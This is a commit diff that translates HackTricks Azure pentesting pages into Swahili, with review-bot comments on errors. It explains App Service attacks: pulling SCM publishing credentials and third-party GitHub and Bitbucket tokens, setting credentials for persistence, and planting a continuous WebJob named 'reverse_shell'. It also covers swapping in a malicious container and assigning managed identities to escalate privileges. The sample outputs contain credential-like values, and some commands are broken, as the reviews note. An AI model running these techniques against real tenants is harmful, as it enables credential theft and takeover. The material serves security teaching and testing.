Translated ['src/pentesting-cloud/azure-security/az-enumeration-tools.md

Translator
2025-01-03 19:25:30 +00:00
parent 2334e62399
commit b59c4346a0
3 changed files with 405 additions and 92 deletions

@@ -2,35 +2,33 @@
{{#include ../../banners/hacktricks-training.md}}
## Install PowerShell in Linux
## Sakinisha PowerShell katika Linux
> [!TIP]
> Katika linux utahitaji kufunga PowerShell Core:
>
> ```bash
> sudo apt-get update
> sudo apt-get install -y wget apt-transport-https software-properties-common
>
> # Ubuntu 20.04
> wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
>
> # Update repos
> sudo apt-get update
> sudo add-apt-repository universe
>
> # Install & start powershell
> sudo apt-get install -y powershell
> pwsh
>
> # Az cli
> curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
> ```
> Katika linux utahitaji kusakinisha PowerShell Core:
```bash
sudo apt-get update
sudo apt-get install -y wget apt-transport-https software-properties-common
## Install PowerShell in MacOS
# Ubuntu 20.04
wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
Maelekezo kutoka kwa [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
# Update repos
sudo apt-get update
sudo add-apt-repository universe
1. Install `brew` ikiwa haijafungwa bado:
# Install & start powershell
sudo apt-get install -y powershell
pwsh
# Az cli
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
```
## Sakinisha PowerShell katika MacOS
Maelekezo kutoka kwa [**nyaraka**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
1. Sakinisha `brew` ikiwa bado haijasakinishwa:
```bash
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
```
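Review bot: In the Linux install block, `wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb` downloads the repository package but no later line installs it, so `sudo apt-get install -y powershell` has no Microsoft repository to resolve the package from. Add `sudo dpkg -i packages-microsoft-prod.deb` between the `wget` line and `# Update repos`. The rewritten version also seems to leave the intro sentence inside the `> [!TIP]` quote while the fenced block moves outside it; check that the tip still renders as one unit. Translating the `##` headings changes their generated anchors, so verify no other page links to the English ones.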
@@ -63,7 +61,7 @@ Kwa kutumia parameter **`--debug`** inawezekana kuona maombi yote ambayo chombo
```bash
az account management-group list --output table --debug
```
Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikono unaweza kufanya:
Ili kufanya **MitM** kwa chombo na **kuangalia maombi yote** yanayotumwa kwa mikono unaweza kufanya:
{{#tabs }}
{{#tab name="Bash" }}
@@ -109,7 +107,7 @@ Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikon
### Microsoft Graph PowerShell
Microsoft Graph PowerShell ni SDK ya kuvuka majukwaa inayowezesha ufikiaji wa APIs zote za Microsoft Graph, ikiwa ni pamoja na huduma kama SharePoint, Exchange, na Outlook, kwa kutumia kiunganishi kimoja. Inasaidia PowerShell 7+, uthibitishaji wa kisasa kupitia MSAL, identiti za nje, na maswali ya hali ya juu. Kwa kuzingatia ufikiaji wa chini wa ruhusa, inahakikisha shughuli salama na inapokea masasisho ya kawaida ili kuendana na vipengele vya hivi karibuni vya Microsoft Graph API.
Microsoft Graph PowerShell ni SDK ya kuvuka majukwaa inayowezesha ufikiaji wa APIs zote za Microsoft Graph, ikiwa ni pamoja na huduma kama SharePoint, Exchange, na Outlook, kwa kutumia kiunganishi kimoja. Inasaidia PowerShell 7+, uthibitishaji wa kisasa kupitia MSAL, identiti za nje, na maswali ya hali ya juu. Kwa kuzingatia ufikiaji wa chini wa ruhusa, inahakikisha shughuli salama na inapokea masasisho ya mara kwa mara ili kuendana na vipengele vya hivi karibuni vya Microsoft Graph API.
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).

@@ -10,16 +10,16 @@ Kwa maelezo zaidi kuhusu Azure App services angalia:
../az-services/az-app-service.md
{{#endref}}
### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read, 
### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read
Ruhusa hizi zinaruhusu kuita amri zifuatazo kupata **SSH shell** ndani ya programu ya wavuti
Ruhusa hizi zinaruhusu kupata **SSH shell** ndani ya programu ya wavuti. Pia zinaruhusu **debug** programu hiyo.
- Chaguo la moja kwa moja:
- **SSH katika amri moja**:
```bash
# Direct option
az webapp ssh --name <name> --resource-group <res-group>
```
- Unda tunnel kisha unganisha na SSH:
- **Unda tunnel kisha unganisha na SSH**:
```bash
az webapp create-remote-connection --name <name> --resource-group <res-group>
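Review bot: The added sentence `Pia zinaruhusu **debug** programu hiyo.` under the first heading claims more than the four permissions in that heading cover: step 5 of the debug procedure added later in this file says the account needs `Microsoft.Web/sites/config/write` when debugging is not already enabled. Qualify the sentence or list that permission. The bullet was also retitled `**SSH katika amri moja**` while the code comment `# Direct option` keeps the old label; align the two.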
@@ -32,4 +32,249 @@ az webapp create-remote-connection --name <name> --resource-group <res-group>
## So from that machine ssh into that port (you might need generate a new ssh session to the jump host)
ssh root@127.0.0.1 -p 39895
```
- **Debug the application**:
1. Sakinisha nyongeza ya Azure katika VScode.
2. Ingia kwenye nyongeza kwa kutumia akaunti ya Azure.
3. Orodhesha huduma zote za App ndani ya usajili.
4. Chagua huduma ya App unayotaka kudhibiti, bonyeza kulia na uchague "Start Debugging".
5. Ikiwa programu haina udhibiti ulioanzishwa, nyongeza itajaribu kuanzisha lakini akaunti yako inahitaji ruhusa `Microsoft.Web/sites/config/write` kufanya hivyo.
### Obtaining SCM Credentials & Enabling Basic Authentication
Ili kupata akreditivu za SCM, unaweza kutumia **amri na ruhusa** zifuatazo:
- Ruhusa **`Microsoft.Web/sites/publishxml/action`** inaruhusu kuita:
```bash
az webapp deployment list-publishing-profiles --name <app-name> --resource-group <res-group>
# Example output
[
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"hostingProviderForumLink": "",
"msdeploySite": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Web Deploy",
"publishMethod": "MSDeploy",
"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
},
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"ftpPassiveMode": "True",
"hostingProviderForumLink": "",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - FTP",
"publishMethod": "FTP",
"publishUrl": "ftps://waws-prod-yt1-067.ftp.azurewebsites.windows.net/site/wwwroot",
"userName": "happy-bay-0d8f842ef57843c89185d452c1cede2a\\$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
},
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"hostingProviderForumLink": "",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Zip Deploy",
"publishMethod": "ZipDeploy",
"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
}
]
```
Kumbuka jinsi **jina la mtumiaji daima ni sawa** (isipokuwa katika FTP ambayo inaongeza jina la programu mwanzoni) lakini **nenosiri ni sawa** kwa wote.
Zaidi ya hayo, **SCM URL ni `<app-name>.scm.azurewebsites.net`**.
- Ruhusa **`Microsoft.Web/sites/config/list/action`** inaruhusu kuita:
```bash
az webapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>
# Example output
{
"id": "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/carlos_rg_3170/providers/Microsoft.Web/sites/happy-bay-0d8f842ef57843c89185d452c1cede2a/publishingcredentials/$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"kind": null,
"location": "Canada Central",
"name": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
"publishingPassword": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"publishingPasswordHash": null,
"publishingPasswordHashSalt": null,
"publishingUserName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"resourceGroup": "carlos_rg_3170",
"scmUri": "https://$happy-bay-0d8f842ef57843c89185d452c1cede2a:bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS@happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net",
"type": "Microsoft.Web/sites/publishingcredentials"
}
```
Kumbuka jinsi **akili ni sawa** na katika amri ya awali.
- Chaguo lingine lingekuwa **kweka akili zako mwenyewe** na kuzitumia:
```bash
az webapp deployment user set \
--user-name hacktricks \
--password 'W34kP@ssw0rd123!'
```
Kisha, unaweza kutumia hizi credentials **kupata kwenye jukwaa la SCM na FTP**. Hii pia ni njia nzuri ya kudumisha uvumilivu.
Kumbuka kwamba ili kupata jukwaa la SCM kutoka **mtandao unahitaji kufikia `<SCM-URL>/BasicAuth`**.
> [!WARNING]
> Kumbuka kwamba kila mtumiaji anaweza kuunda credentials zake mwenyewe kwa kuita amri ya awali, lakini ikiwa mtumiaji hana ruhusa za kutosha kupata SCM au FTP, credentials hazitafanya kazi.
- Ikiwa unaona kwamba hizo credentials zime **REDACTED**, ni kwa sababu unahitaji **kuwezesha chaguo la uthibitishaji wa msingi wa SCM** na kwa hiyo unahitaji ruhusa ya pili (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
```bash
# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'
# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}
```
### Chapisha msimbo kwa kutumia akreditivu za SCM
Kuwa na akreditivu halali za SCM kunawezesha **chapisha msimbo** kwenye huduma ya App. Hii inaweza kufanywa kwa kutumia amri ifuatayo.
Kwa mfano huu wa python unaweza kupakua repo kutoka https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart, fanya **mabadiliko** yoyote unayotaka na kisha **zip kwa kukimbia: `zip -r app.zip .`**.
Kisha unaweza **chapisha msimbo** kwa kutumia amri ifuatayo:
```bash
curl -X POST "<SMC-URL>/api/publish?type=zip" --data-binary "@./app.zip" -u '<username>:<password>' -H "Content-Type: application/octet-stream"
```
### Microsoft.Web/sites/publish/Action | SCM credentials
Ruhusa iliyoelezwa ya Azure inaruhusu kufanya vitendo kadhaa vya kuvutia ambavyo vinaweza pia kufanywa kwa kutumia SCM credentials:
- Soma **Webjobs** logs:
```bash
# Using Azure credentials
az rest --method GET --url "<SCM-URL>/vfs/data/jobs/<continuous | triggered>/rev5/job_log.txt" --resource "https://management.azure.com/"
az rest --method GET --url "https://lol-b5fyaeceh4e9dce0.scm.canadacentral-01.azurewebsites.net/vfs/data/jobs/continuous/rev5/job_log.txt" --resource "https://management.azure.com/"
# Using SCM username and password:
curl "<SCM-URL>/vfs/data/jobs/continuous/job_name/job_log.txt" \
--user '<username>:<password>>' -v
```
- Soma **Webjobs** msimbo wa chanzo:
```bash
# Using SCM username and password:
# Find all the webjobs inside:
curl "<SCM-URL>/wwwroot/App_Data/jobs/" \
--user '<username>:<password>'
# e.g.
curl "https://nodewebapp-agamcvhgg3gkd3hs.scm.canadacentral-01.azurewebsites.net/wwwroot/App_Data/jobs/continuous/job_name/rev.js" \
--user '<username>:<password>'
```
- Unda **Webjob isiyokatizwa**:
```bash
# Using Azure permissions
az rest \
--method put \
--uri "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/api/Continuouswebjobs/reverse_shell" \
--headers '{"Content-Disposition": "attachment; filename=\"rev.js\""}' \
--body "@/Users/username/Downloads/rev.js" \
--resource "https://management.azure.com/"
# Using SCM credentials
curl -X PUT \
"<SCM-URL>/api/Continuouswebjobs/reverse_shell2" \
-H 'Content-Disposition: attachment; filename=rev.js' \
--data-binary "@/Users/carlospolop/Downloads/rev.js" \
--user '<username>:<password>'
```
### Microsoft.Web/sites/config/list/action
Ruhusa hii inaruhusu kuorodhesha **connection strings** na **appsettings** za huduma ya App ambazo zinaweza kuwa na taarifa nyeti kama vile akidi za database.
```bash
az webapp config connection-string list --name <name> --resource-group <res-group>
az webapp config appsettings list --name <name> --resource-group <res-group>
```
### Microsoft.Web/sites/write, Microsoft.Web/sites/read, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
Hizi ruhusa zinaruhusu **kuteua utambulisho wa kusimamiwa** kwa huduma ya App, hivyo ikiwa huduma ya App ilishambuliwa hapo awali hii itamruhusu mshambuliaji kuteua utambulisho mpya wa kusimamiwa kwa huduma ya App na **kuinua mamlaka** kwao.
```bash
az webapp identity assign --name <app-name> --resource-group <res-group> --identities /subscriptions/<subcripttion-id>/resourceGroups/<res_group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>
```
### Soma Akikodi za Watu wa Tatu Zilizowekwa
Kukimbia amri ifuatayo inawezekana **kusoma akidi za watu wa tatu** zilizowekwa katika akaunti ya sasa. Kumbuka kwamba ikiwa kwa mfano akidi za Github zimewekwa kwa mtumiaji tofauti, huwezi kupata token kutoka kwa mwingine.
```bash
az rest --method GET \
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
```
Amri hii inarudisha tokeni za Github, Bitbucket, Dropbox na OneDrive.
Hapa kuna mifano ya amri za kuangalia tokeni:
```bash
# GitHub List Repositories
curl -H "Authorization: token <token>" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/repos
# Bitbucket List Repositories
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://api.bitbucket.org/2.0/repositories
# Dropbox List Files in Root Folder
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
--data '{"path": ""}'
# OneDrive List Files in Root Folder
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://graph.microsoft.com/v1.0/me/drive/root/children
```
### Update App Code from the source
- Ikiwa chanzo kilichowekwa ni mtoa huduma wa tatu kama Github, BitBucket au Azure Repository, unaweza **kusaidia kuimarisha msimbo** wa huduma ya App kwa kuingilia msimbo wa chanzo katika hifadhi.
- Ikiwa programu imewekwa kutumia **hifadhi ya git ya mbali** (ikiwa na jina la mtumiaji na nenosiri), inawezekana kupata **URL na akreditif za msingi za uthibitishaji** ili kunakili na kusukuma mabadiliko kwa:
- Kutumia ruhusa **`Microsoft.Web/sites/sourcecontrols/read`**: `az webapp deployment source show --name <app-name> --resource-group <res-group>`
- Kutumia ruhusa **`Microsoft.Web/sites/config/list/action`**:
- `az webapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>`
- `az rest --method POST --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"`
- Ikiwa programu imewekwa kutumia **hifadhi ya git ya ndani**, inawezekana **kunakili hifadhi** na **kusukuma mabadiliko** ndani yake:
- Kutumia ruhusa **`Microsoft.Web/sites/sourcecontrols/read`**: Unaweza kupata URL ya hifadhi ya git kwa `az webapp deployment source show --name <app-name> --resource-group <res-group>`, lakini itakuwa sawa na URL ya SCM ya programu yenye njia `/<app-name>.git` (kwa mfano, `https://pythonwebapp-audeh9f5fzeyhhed.scm.canadacentral-01.azurewebsites.net:443/pythonwebapp.git`).
- Ili kupata akreditif za SCM unahitaji ruhusa:
- **`Microsoft.Web/sites/publishxml/action`**: Kisha endesha `az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>`.
- **`Microsoft.Web/sites/config/list/action`**: Kisha endesha `az webapp deployment list-publishing-credentials --name <name> --resource-group <res-group>`
> [!WARNING]
> Kumbuka kwamba kuwa na ruhusa `Microsoft.Web/sites/config/list/action` na akreditif za SCM daima inawezekana kupeleka kwenye webapp (hata kama ilipangwa kutumia mtoa huduma wa tatu) kama ilivyotajwa katika sehemu ya awali.
> [!WARNING]
> Kumbuka kwamba kuwa na ruhusa zilizo hapa chini pia ni **uwezekano wa kutekeleza kontena chochote** hata kama webapp ilipangwa tofauti.
### `Microsoft.Web/sites/config/Write`, `Microsoft.Web/sites/config/Read`, `Microsoft.Web/sites/config/list/Action`, `Microsoft.Web/sites/Read`
Hii ni seti ya ruhusa inayoruhusu **kubadilisha kontena kinachotumika** na webapp. Mshambuliaji anaweza kuitumia vibaya kufanya webapp itekeleze kontena chenye uharibifu.
```bash
az webapp config container set \
--name <app-name> \
--resource-group <res-group> \
--docker-custom-image-name mcr.microsoft.com/appsvc/staticsite:latest
```
{{#include ../../../banners/hacktricks-training.md}}
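Review bot: In the `# Enable basic authentication for FTP` command the `--body '{` argument is never closed: the block ends with a bare `}` where the SCM command above it ends with `}'`, so pasting it leaves the shell waiting on an open quote. Other copy-paste breakers in this hunk are `<SMC-URL>` in the `/api/publish?type=zip` curl (it is `<SCM-URL>` everywhere else), `'<username>:<password>>'` in the Webjobs log curl, `<subcripttion-id>` and `<res_group>` in `az webapp identity assign`, and the `):` that ended up inside the code span after `Microsoft.Web/sites/basicPublishingCredentialsPolicies/write` on the REDACTED bullet. The example outputs and commands carry what look like real values (the `userPWD` / `publishingPassword` string, a subscription GUID, `carlos_rg_3170`, `/Users/carlospolop/Downloads/rev.js`, full `*.scm.canadacentral-01.azurewebsites.net` hostnames); replace them with placeholders before merging. On the translation side, the same term is rendered as `akreditivu`, `akili`, `akidi`, `akreditif`, `Akikodi` and `credentials`, and three headings (`Obtaining SCM Credentials & Enabling Basic Authentication`, `Update App Code from the source`, `Debug the application`) are still in English; pick one term and one language for headings.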

@@ -4,34 +4,85 @@
## App Service Basic Information
Azure App Services inaruhusu waendelezaji **kuunda, kupeleka, na kupanua programu za wavuti, nyuma za programu za rununu, na APIs bila shida**. Inasaidia lugha nyingi za programu na inajumuisha zana na huduma mbalimbali za Azure kwa ajili ya kuboresha kazi na usimamizi.
Azure App Services inaruhusu waendelezaji **kuunda, kupeleka, na kupanua programu za wavuti, nyuma ya programu za simu, na APIs bila shida**. Inasaidia lugha nyingi za programu na inajumuisha zana na huduma mbalimbali za Azure kwa ajili ya kuboresha kazi na usimamizi.
Kila programu inafanya kazi ndani ya sandbox lakini kutengwa kunategemea mipango ya App Service
- Programu katika ngazi za Bure na Kushiriki zinafanya kazi kwenye VMs za pamoja
- Programu katika ngazi za Kawaida na Premium zinafanya kazi kwenye VMs maalum
- Programu katika ngazi za Bure na Kushiriki zinafanya kazi kwenye VMs zinazoshirikiwa
- Programu katika ngazi za Kawaida na Kitaalamu zinafanya kazi kwenye VMs zilizotengwa
> [!WARNING]
> Kumbuka kwamba **hakuna** ya kutengwa hizo **zinazuia** udhaifu mwingine wa kawaida wa **wavuti** (kama vile kupakia faili, au sindano). Na ikiwa **utambulisho wa usimamizi** unatumika, inaweza kuwa na uwezo wa **kuinua mamlaka kwao**.
> Kumbuka kwamba **hakuna** ya kutengwa hizo **inaepusha** udhaifu mwingine wa kawaida wa **wavuti** (kama vile kupakia faili, au sindano). Na ikiwa **utambulisho wa usimamizi** unatumika, inaweza kuwa na uwezo wa **kuinua mamlaka kwao**.
### Azure Function Apps
Programu zina mipangilio ya kuvutia:
Kimsingi **Azure Function apps ni sehemu ya Azure App Service** katika wavuti na ikiwa utaenda kwenye console ya wavuti na orodheshe huduma zote za programu au tekeleza `az webapp list` katika az cli utaweza **kuona Function apps pia zikiwa orodheshwa hapa**.
Kwa kweli baadhi ya **vipengele vinavyohusiana na usalama** ambavyo huduma za programu zinatumia (`webapp` katika az cli), **pia vinatumika na Function apps**.
- **Daima Iko**: Inahakikisha kwamba programu inafanya kazi kila wakati. Ikiwa haijawashwa, programu itasimama kufanya kazi baada ya dakika 20 za kutokuwa na shughuli na itaanza tena wakati ombi litakapopokelewa.
- Hii ni muhimu ikiwa una kazi ya wavuti inayohitaji kufanya kazi bila kukatika kwani kazi ya wavuti itasimama ikiwa programu itasimama.
- **SSH**: Ikiwa imewashwa, mtumiaji mwenye ruhusa ya kutosha anaweza kuungana na programu kwa kutumia SSH.
- **Kusafisha**: Ikiwa imewashwa, mtumiaji mwenye ruhusa ya kutosha anaweza kusafisha programu. Hata hivyo, hii inazuiliwa kiotomatiki kila masaa 48.
- **Programu ya Wavuti + Hifadhidata**: Kihifadhi cha wavuti kinaruhusu kuunda Programu yenye hifadhidata. Katika kesi hii inawezekana kuchagua hifadhidata ya kutumia (SQLAzure, PostgreSQL, MySQL, MongoDB) na pia inaruhusu kuunda Cache ya Azure kwa Redis.
- URL inayoshikilia taarifa za kuingia kwa hifadhidata na Redis itahifadhiwa katika **appsettings**.
- **Konteina**: Inawezekana kupeleka konteina kwa App Service kwa kuashiria URL ya konteina na taarifa za kuingia ili kuweza kuipata.
## Basic Authentication
Unapounda programu ya wavuti (na kazi ya Azure kwa kawaida) inawezekana kuashiria ikiwa unataka Uthibitishaji wa Msingi uwekwe. Hii kimsingi **inawezesha SCM na FTP** kwa ajili ya programu ili iwezekane kupeleka programu kwa kutumia teknolojia hizo.\
Wakati wa kuunda programu ya wavuti (na kazi ya Azure kwa kawaida) inawezekana kuashiria ikiwa unataka Uthibitishaji wa Msingi uwe umewashwa. Hii kimsingi **inawezesha SCM na FTP** kwa programu ili iwezekane kupeleka programu kwa kutumia teknolojia hizo.\
Zaidi ya hayo ili kuungana nazo, Azure inatoa **API inayoruhusu kupata jina la mtumiaji, nenosiri na URL** ya kuungana na seva za SCM na FTP.
- Uthibitishaji: az webapp auth show --name lol --resource-group lol_group
Inawezekana kuungana na SCM kwa kutumia kivinjari cha wavuti katika `https://<SMC-URL>/BasicAuth` na kuangalia faili zote na upelelezi huko.
SSH
### Kudu
Daima On
Kudu ni **injini ya upelelezi na jukwaa la usimamizi kwa Azure App Service na Function Apps**, ikitoa upelelezi wa msingi wa Git, kusafisha kwa mbali, na uwezo wa usimamizi wa faili kwa programu za wavuti. Inapatikana kupitia URL ya SCM ya programu ya wavuti.
Kumbuka kwamba toleo la Kudu linalotumiwa na App Services na na Function Apps ni tofauti, toleo la Function apps likiwa na mipaka zaidi.
Baadhi ya maeneo ya kuvutia unaweza kuyapata katika Kudu ni:
- `/DebugConsole`: Kihifadhi kinachokuruhusu kutekeleza amri katika mazingira ambapo Kudu inafanya kazi.
- Kumbuka kwamba mazingira haya **hayana ufikiaji** wa huduma ya metadata ili kupata tokens.
- `/webssh/host`: Mteja wa SSH wa wavuti unaokuruhusu kuungana ndani ya konteina ambapo programu inafanya kazi.
- Hali hii **ina ufikiaji wa huduma ya metadata** ili kupata tokens kutoka kwa utambulisho wa usimamizi uliotolewa.
- `/Env`: Pata taarifa kuhusu mfumo, mipangilio ya programu, mabadiliko ya mazingira, nyuzi za muunganisho na vichwa vya HTTP.
- `/wwwroot/`: Katalogi ya mzizi ya programu ya wavuti. Unaweza kupakua faili zote kutoka hapa.
## Sources
App Services inaruhusu kupakia msimbo kama faili ya zip kwa default, lakini pia inaruhusu kuungana na huduma ya mtu wa tatu na kupata msimbo kutoka huko.
- Vyanzo vya mtu wa tatu vinavyoungwa mkono kwa sasa ni **Github** na **Bitbucket**.
- Unaweza kupata tokens za uthibitishaji kwa kukimbia `az rest --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"`
- Azure kwa default itaunda **Github Action** ili kupeleka msimbo kwa App Service kila wakati msimbo unaposasishwa.
- Pia inawezekana kuashiria **hifadhi ya git ya mbali** (ikiwa na jina la mtumiaji na nenosiri) ili kupata msimbo kutoka huko.
- Unaweza kupata taarifa za kuingia kwa hifadhi ya mbali kwa kukimbia `az webapp deployment source show --name <app-name> --resource-group <res-group>` au `az rest --method POST --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"`
- Pia inawezekana kutumia **Azure Repository**.
- Pia inawezekana kuunda **hifadhi ya git ya ndani**.
- Unaweza kupata URL ya hifadhi ya git kwa `az webapp deployment source show --name <app-name> --resource-group <res-group>` na itakuwa URL ya SCM ya programu.
- Ili kuikopi unahitaji taarifa za kuingia za SCM ambazo unaweza kupata kwa `az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>`
## Webjobs
Azure WebJobs ni **kazi za nyuma zinazofanya kazi katika mazingira ya Azure App Service**. Zinawaruhusu waendelezaji kutekeleza skripti au programu pamoja na programu zao za wavuti, na kufanya iwe rahisi kushughulikia shughuli zisizo za kawaida au zinazohitaji muda kama vile usindikaji wa faili, usimamizi wa data, au kazi za ratiba.
Kuna aina 2 za kazi za wavuti:
- **Kudumu**: Inafanya kazi bila kikomo katika mzunguko na inasababishwa mara tu inapotengenezwa. Ni bora kwa kazi zinazohitaji usindikaji wa mara kwa mara. Hata hivyo, ikiwa programu itasimama kufanya kazi kwa sababu Daima Iko haijawashwa na haijapokea ombi katika dakika 20 zilizopita, kazi ya wavuti pia itasimama.
- **Iliyosababishwa**: Inafanya kazi kwa ombi au kulingana na ratiba. Inafaa zaidi kwa kazi za mara kwa mara, kama vile masasisho ya data ya kundi au taratibu za matengenezo.
Webjobs ni za kuvutia sana kutoka kwa mtazamo wa washambuliaji kwani zinaweza kutumika **kutekeleza msimbo** katika mazingira na **kuinua mamlaka** kwa utambulisho wa usimamizi uliounganishwa.
Zaidi ya hayo, kila wakati ni ya kuvutia kuangalia **kumbukumbu** zinazozalishwa na Webjobs kwani zinaweza kuwa na **taarifa nyeti**.
### Slots
Azure App Service Slots zinatumika **kupeleka toleo tofauti la programu** kwa App Service moja. Hii inaruhusu waendelezaji kujaribu vipengele au mabadiliko mapya katika mazingira tofauti kabla ya kupeleka kwenye mazingira ya uzalishaji.
Zaidi ya hayo, inawezekana kuelekeza **asilimia ya trafiki** kwa slot maalum, ambayo ni muhimu kwa **A/B testing**, na kwa madhumuni ya nyuma ya mlango.
### Azure Function Apps
Kimsingi **Azure Function apps ni sehemu ya Azure App Service** katika wavuti na ikiwa utaenda kwenye kihifadhi cha wavuti na kuorodhesha huduma zote za programu au kutekeleza `az webapp list` katika az cli utaweza **kuona Function apps pia zimeorodheshwa hapa**.
Kwa kweli baadhi ya **vipengele vinavyohusiana na usalama** App services hutumia (`webapp` katika az cli), pia **vinatumika na Function apps**.
Kukarabati
### Enumeration
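Review bot: Several feature names in this hunk are translated into words that change the technical meaning: `Kusafisha` (and `kusafisha kwa mbali` in the Kudu paragraph) stands where the privesc page in this same commit says Debug / `Start Debugging`, Kudu is described as `injini ya upelelezi` where deployment is meant, and the console is `Kihifadhi` in some lines and `console ya wavuti` in others. Readers have to match these to the Azure portal and CLI, so keep product feature names (Always On, Debugging, Deployment, Console, Premium) in English or fix one agreed term each; at the moment Always On appears as both `Daima Iko` and `Daima On`, and Premium as both `Premium` and `Kitaalamu`. The BasicAuth URL is written `https://<SMC-URL>/BasicAuth` and should use `<SCM-URL>`. The `### Azure Function Apps` heading and its two paragraphs appear twice in the hunk; confirm only one copy survives the move.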
@@ -40,9 +91,10 @@ Kukarabati
```bash
# List webapps
az webapp list
## Less information
az webapp list --query "[].{hostName: defaultHostName, state: state, name: name, resourcegroup: resourceGroup}"
az webapp list --query "[].{hostName: defaultHostName, state: state, name: name, resourcegroup: resourceGroup}" -o table
## Get SCM URL of each webapp
az webapp list | grep '"name"' | grep "\.scm\." | awk '{print $2}' | sed 's/"//g'
# Get info about 1 app
az webapp show --name <name> --resource-group <res-group>
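Review bot: The `## Get SCM URL of each webapp` line extracts hostnames with `grep '"name"' | grep "\.scm\." | awk '{print $2}' | sed 's/"//g'`, which depends on the pretty-printed JSON layout and on the field position in each line. The line just above already uses `--query`; a JMESPath expression with `-o tsv` would return the same hostnames without text scraping and would not break if the CLI output format changes.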
@@ -51,18 +103,24 @@ az webapp show --name <name> --resource-group <res-group>
az webapp list-instances --name <name> --resource-group <res-group>
## If you have enough perm you can go to the "consoleUrl" and access a shell inside the instance form the web
# Get configured Auth information
